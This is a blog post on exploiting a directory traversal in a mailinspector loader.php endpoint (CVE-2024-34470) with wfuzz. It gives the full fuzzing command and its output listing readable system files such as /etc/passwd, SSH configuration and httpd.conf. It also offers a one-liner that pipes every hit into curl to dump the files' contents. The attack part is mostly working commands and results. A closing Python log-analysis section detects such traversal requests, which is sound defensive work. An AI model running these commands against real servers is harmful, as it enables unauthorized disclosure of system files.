"A wfuzz use case": brute-forcing with wfuzz after finding a directory traversal vulnerability

Posted by sesmof on 2024-06-15
┌──(root㉿kali)-[~]
└─# wfuzz -u http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ -w ~/weapons/http-payloads/linux_dir.txt --hl 0
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://XXX.XXX.XXX.XXX/mailinspector/public/loader.php?path=../../../../../../..FUZZ
Total requests: 201

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                         
=====================================================================

000000031:   200        1 L      2 W        28 Ch       "/etc/ld.so.conf"                                                               
000000017:   200        9 L      54 W       687 Ch      "/etc/fstab"                                                                    
000000016:   200        13 L     53 W       404 Ch      "/etc/crontab"                                                                  
000000029:   200        131 L    446 W      3523 Ch     "/etc/init.d/httpd"                                                             
000000030:   200        476 L    1763 W     14066 Ch    "/etc/init.d/mysql"                                                             
000000038:   200        36 L     48 W       1645 Ch     "/etc/passwd"                                                                   
000000053:   200        2 L      4 W        48 Ch       "/etc/resolv.conf"                                                              
000000057:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000058:   200        52 L     262 W      1836 Ch     "/etc/ssh/ssh_config"                                                           
000000020:   200        24 L     88 W       560 Ch      "/etc/httpd/conf.d/php.conf"                                                    
000000072:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000071:   200        3 L      3 W        67 Ch       "/etc/sysconfig/network"                                                        
000000069:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000066:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000070:   200        1 L      2 W        382 Ch      "/etc/ssh/ssh_host_rsa_key.pub"                                                 
000000065:   200        1 L      3 W        627 Ch      "/etc/ssh/ssh_host_key.pub"                                                     
000000062:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000039:   200        182 L    491 W      4608 Ch     "/etc/php.ini"                                                                  
000000061:   200        1 L      2 W        590 Ch      "/etc/ssh/ssh_host_dsa_key.pub"                                                 
000000021:   200        991 L    4834 W     33726 Ch    "/etc/httpd/conf/httpd.conf"                                                    
000000143:   200        8 L      6 W        306 Ch      "/usr/local/Zend/etc/php.ini"                                                   

Total time: 0
Processed Requests: 201
Filtered Requests: 180
Requests/sec.: 0

Reference: CVE-2024-34470
Addendum: AI-polished version of the command

wfuzz -u 'http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..FUZZ' -w ~/weapons/http-payloads/linux_dir.txt --hl 0 | grep '"/' | awk '!/ 0 L/' | cut -d '"' -f 2 | xargs -I {} sh -c 'echo "$1,<--------"; curl -s "http://x.x.x.x/mailinspector/public/loader.php?path=../../../../../../..$1"' _ {}
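From the defender's side, the run above leaves a recognizable trail in the web server's access log. The following is an added example, not part of the original post: it flags traversal requests against the loader.php path parameter and lists which files were actually served. The combined log format, the burst threshold, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit

# Endpoint and parameter as they appear in the wfuzz command in the post.
ENDPOINT = "/mailinspector/public/loader.php"
PARAM = "path"
# Assumption: the server writes Apache/nginx "combined" access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)')

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE = [
    '192.0.2.10 - - [15/Jun/2024:10:00:01 +0000] "GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd HTTP/1.1" 200 1645 "-" "-"',
    '192.0.2.10 - - [15/Jun/2024:10:00:01 +0000] "GET /mailinspector/public/loader.php?path=../../../../../../../etc/shadow HTTP/1.1" 200 0 "-" "-"',
    '192.0.2.10 - - [15/Jun/2024:10:00:02 +0000] "GET /mailinspector/public/loader.php?path=%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2ffstab HTTP/1.1" 200 687 "-" "-"',
    '198.51.100.7 - - [15/Jun/2024:10:05:00 +0000] "GET /mailinspector/public/loader.php?path=css/login.css HTTP/1.1" 200 2048 "-" "-"',
]

def traversal_value(target):
    """Return the decoded path= value if it contains a '..' segment, else None."""
    parts = urlsplit(target)
    if parts.path != ENDPOINT:
        return None
    for raw in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs decodes once; decode again so double-encoded dots are seen too.
        value = unquote(raw).replace("\\", "/")
        if any(segment == ".." for segment in value.split("/")):
            return value
    return None

def detect(lines, burst=3):
    """Per client IP: traversal request count, files served, scan-like burst."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        value = traversal_value(m["target"]) if m else None
        if value is None:
            continue
        # The post filters misses with --hl 0, so a miss is an empty 200;
        # a 200 with a non-empty body is treated here as a file that leaked.
        served = m["status"] == "200" and m["size"] not in ("0", "-")
        hits[m["ip"]].append((value, served))
    return {ip: {"requests": len(seen),
                 "served": sorted({v for v, ok in seen if ok}),
                 "scan": len(seen) >= burst}
            for ip, seen in hits.items()}
```

Calling detect(SAMPLE) reports only 192.0.2.10, with the two files that came back non-empty listed under "served"; those are the files to treat as disclosed during incident response.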
